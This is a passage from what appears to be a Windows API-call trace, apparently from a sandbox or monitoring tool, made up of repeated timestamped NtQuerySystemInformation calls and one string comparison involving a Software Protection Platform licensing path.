ResultLength=0x0) [0290.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dc68, Length=0x48, ResultLength=0x0) [0290.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dc68, Length=0x48, ResultLength=0x0) [0290.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dc68, Length=0x48, ResultLength=0x0) [0290.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dba0, Length=0x28, ResultLength=0x0) [0290.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dba0, Length=0x28, ResultLength=0x0) [0290.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dc68, Length=0x48, ResultLength=0x0) [0290.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dc68, Length=0x48, ResultLength=0x0) [0290.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dc68, Length=0x48, ResultLength=0x0) [0290.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dba0, Length=0x28, ResultLength=0x0) [0290.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dba0, Length=0x28, ResultLength=0x0) [0290.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dc68, Length=0x48, ResultLength=0x0) [0290.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dc68, Length=0x48, ResultLength=0x0) [0290.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dc68, Length=0x48, ResultLength=0x0) [0290.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dba0, Length=0x28, ResultLength=0x0) [0290.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dba0, Length=0x28, ResultLength=0x0) [0290.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dc68, Length=0x48, ResultLength=0x0) [0290.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dc68, Length=0x48, ResultLength=0x0) [0290.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dc68, Length=0x48, ResultLength=0x0) [0290.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dba0, Length=0x28, ResultLength=0x0) [0290.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dba0, Length=0x28, ResultLength=0x0) [0290.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.021] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dc68, Length=0x48, ResultLength=0x0) [0290.021] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.021] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dc68, Length=0x48, ResultLength=0x0) [0290.021] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.021] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dc68, Length=0x48, ResultLength=0x0) [0290.021] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dba0, Length=0x28, ResultLength=0x0) [0290.021] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.021] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dba0, Length=0x28, ResultLength=0x0) [0290.021] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.021] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.021] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dc68, Length=0x48, ResultLength=0x0) [0290.022] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.022] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dc68, Length=0x48, ResultLength=0x0) [0290.022] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dbb0, Length=0x48, ResultLength=0x0) [0290.022] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217db10, Length=0x28, ResultLength=0x0) [0290.022] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.022] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217db10, Length=0x28, ResultLength=0x0) [0290.022] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.022] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.022] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.022] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dc68, Length=0x48, ResultLength=0x0) [0290.022] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.022] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dc68, Length=0x48, ResultLength=0x0) [0290.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dbb0, Length=0x48, ResultLength=0x0) [0290.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217db10, Length=0x28, ResultLength=0x0) [0290.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217db10, Length=0x28, ResultLength=0x0) [0290.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dd90, Length=0x40, ResultLength=0x0) [0290.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dd90, Length=0x40, ResultLength=0x0) [0290.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217da80, Length=0x50, ResultLength=0x0) [0290.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217da80, Length=0x50, ResultLength=0x0) [0290.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217da80, Length=0x50, ResultLength=0x0) [0290.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d970, Length=0x50, ResultLength=0x0) [0290.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d970, Length=0x50, ResultLength=0x0) [0290.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d970, Length=0x50, ResultLength=0x0) [0290.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d970, Length=0x50, ResultLength=0x0) [0290.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d8a0, Length=0x38, ResultLength=0x0) [0290.033] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.033] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d6d0, Length=0x28, ResultLength=0x0) [0290.033] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.033] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.033] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d6d0, Length=0x28, ResultLength=0x0) [0290.034] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.034] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.034] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d6d0, Length=0x28, ResultLength=0x0) [0290.034] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.034] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.034] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d740, Length=0x28, ResultLength=0x0) [0290.034] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d8a0, Length=0x38, ResultLength=0x0) [0290.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d7c0, Length=0x28, ResultLength=0x0) [0290.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d7c0, Length=0x28, ResultLength=0x0) [0290.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d8a0, Length=0x38, ResultLength=0x0) [0290.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d720, Length=0x20, ResultLength=0x0) [0290.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d6a0, Length=0x20, ResultLength=0x0) [0290.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d6a0, Length=0x20, ResultLength=0x0) [0290.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d6a0, Length=0x20, ResultLength=0x0) [0290.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d8a0, Length=0x38, ResultLength=0x0) [0290.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d720, Length=0x20, ResultLength=0x0) [0290.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d6b0, Length=0x20, ResultLength=0x0) [0290.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d6b0, Length=0x20, ResultLength=0x0) [0290.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217da80, Length=0x50, ResultLength=0x0) [0290.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217da80, Length=0x50, ResultLength=0x0) [0290.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217da80, Length=0x50, ResultLength=0x0) [0290.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d970, Length=0x50, ResultLength=0x0) [0290.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d970, Length=0x50, ResultLength=0x0) [0290.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d970, Length=0x50, ResultLength=0x0) [0290.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d970, Length=0x50, ResultLength=0x0) [0290.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d8a0, Length=0x38, ResultLength=0x0) [0290.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d6d0, Length=0x28, ResultLength=0x0) [0290.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d6d0, Length=0x28, ResultLength=0x0) [0290.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d6d0, Length=0x28, ResultLength=0x0) [0290.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d740, Length=0x28, ResultLength=0x0) [0290.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d8a0, Length=0x38, ResultLength=0x0) [0290.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d7c0, Length=0x28, ResultLength=0x0) [0290.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d7c0, Length=0x28, ResultLength=0x0) [0290.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d8a0, Length=0x38, ResultLength=0x0) [0290.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d720, Length=0x20, ResultLength=0x0) [0290.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d6a0, Length=0x20, ResultLength=0x0) [0290.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d6a0, Length=0x20, ResultLength=0x0) [0290.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d6a0, Length=0x20, ResultLength=0x0) [0290.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d8a0, Length=0x38, ResultLength=0x0) [0290.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d720, Length=0x20, ResultLength=0x0) [0290.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d6b0, Length=0x20, ResultLength=0x0) [0290.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d6b0, Length=0x20, ResultLength=0x0) [0290.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217db30, Length=0x50, ResultLength=0x0) [0290.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dab0, Length=0x28, ResultLength=0x0) [0290.145] _wcsicmp (_String1="SPPSVC\\0ff1ce15-a989-479d-af46-f275c6370663\\2cb19a15-bab2-4fcb-acee-4bde5be207a5", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0290.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217db30, Length=0x50, ResultLength=0x0) [0290.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217db30, Length=0x50, ResultLength=0x0) [0290.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217db30, Length=0x50, ResultLength=0x0) [0290.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217da60, Length=0x38, ResultLength=0x0) [0290.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d890, Length=0x28, ResultLength=0x0) [0290.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d890, Length=0x28, ResultLength=0x0) [0290.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d890, Length=0x28, ResultLength=0x0) [0290.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d900, Length=0x28, ResultLength=0x0) [0290.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217da60, Length=0x38, ResultLength=0x0) [0290.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d980, Length=0x28, ResultLength=0x0) [0290.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d980, Length=0x28, ResultLength=0x0) [0290.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, 